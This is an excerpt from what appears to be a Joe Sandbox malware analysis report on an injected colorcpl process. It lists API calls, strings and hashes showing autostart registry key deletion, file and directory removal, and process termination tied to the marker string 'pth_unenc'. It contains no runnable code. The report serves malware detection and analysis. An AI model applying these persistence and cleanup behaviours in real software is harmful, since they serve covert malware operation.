                                                          • Instruction Fuzzy Hash: 36E08631B0021457FD78797DEA1A77D3A25CB42BE8F400619EB838B699DE87891057E3
                                                          APIs
                                                          • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,02F9D17F,00000000,030052D8,030052F0,?,pth_unenc), ref: 02FA3A6C
                                                          • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 02FA3A80
                                                          Strings
                                                          • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 02FA3A6A
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DeleteOpenValue
                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                          • API String ID: 2654517830-1051519024
                                                          • Opcode ID: a5cb0ff5fee356bc6b6db1bc5db4661b7364718aa0d5e51303958ef97b13afab
                                                          • Instruction ID: 2e76c760c51e7d57640384f82791e8b8d414e03a07d63d4cc3e0f36553801dd0
                                                          • Opcode Fuzzy Hash: a5cb0ff5fee356bc6b6db1bc5db4661b7364718aa0d5e51303958ef97b13afab
                                                          • Instruction Fuzzy Hash: 7CE0C272A8420CFBDF115E71DD06FBABB2CDB01F80F000698BB0696181C7629A149770
                                                          APIs
                                                          • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 02F9B8B1
                                                          • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 02F9B8DC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DeleteDirectoryFileRemove
                                                          • String ID: pth_unenc
                                                          • API String ID: 3325800564-4028850238
                                                          • Opcode ID: 8e363902df7a12d78ebe37b1fe729fc3f3903dbe7afa2891eaca930d9c1cf509
                                                          • Instruction ID: 3be14406d719a26bebb5d68c3d6a0933089d51c72b7a30f14afa74c560db6747
                                                          • Opcode Fuzzy Hash: 8e363902df7a12d78ebe37b1fe729fc3f3903dbe7afa2891eaca930d9c1cf509
                                                          • Instruction Fuzzy Hash: F0E0C2718516288BEF22FB30DC94BEB739DAF04299F00092AD5A3D3120DF61984ADF60
                                                          APIs
                                                          • TerminateProcess.KERNEL32(00000000,pth_unenc,02F9F903), ref: 02FA289B
                                                          • WaitForSingleObject.KERNEL32(000000FF), ref: 02FA28AE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ObjectProcessSingleTerminateWait
                                                          • String ID: pth_unenc
                                                          • API String ID: 1872346434-4028850238
                                                          • Opcode ID: 48925a2ffacb3ef807257aa55ddeb36dcceca10e0df478d74bdcf993b6bc264a
                                                          • Instruction ID: 240077f2977db8c5dd692d4fbc568b4e7d775179f155fd890f58d5812c4ed4f1
                                                          • Opcode Fuzzy Hash: 48925a2ffacb3ef807257aa55ddeb36dcceca10e0df478d74bdcf993b6bc264a
                                                          • Instruction Fuzzy Hash: C6D0C93458A216ABDF222B60AD4CB447A5C9705269F100A02B431552E4C7694864AB21
                                                          APIs
                                                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 02FA1BC7
                                                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 02FA1C93
                                                          • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02FA1CB5
                                                          • SetLastError.KERNEL32(0000007E,02FA1F2B), ref: 02FA1CCC
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLastRead
                                                          • String ID:
                                                          • API String ID: 4100373531-0
                                                          • Opcode ID: d898a1fe6d8244430d526caa5a6a0d12b7ab91cd18e0f2629e8750ee9d6567f0
                                                          • Instruction ID: 5a5f4104602e31e4df6308e7fc842ec57fabc87dcc7fd054fc41ea296c4b91a8
                                                          • Opcode Fuzzy Hash: d898a1fe6d8244430d526caa5a6a0d12b7ab91cd18e0f2629e8750ee9d6567f0
                                                          • Instruction Fuzzy Hash: D5418EB2B043059FEB248F19DD94BA7B7E8FF44758F01082DEA4A87651EB71E904DB11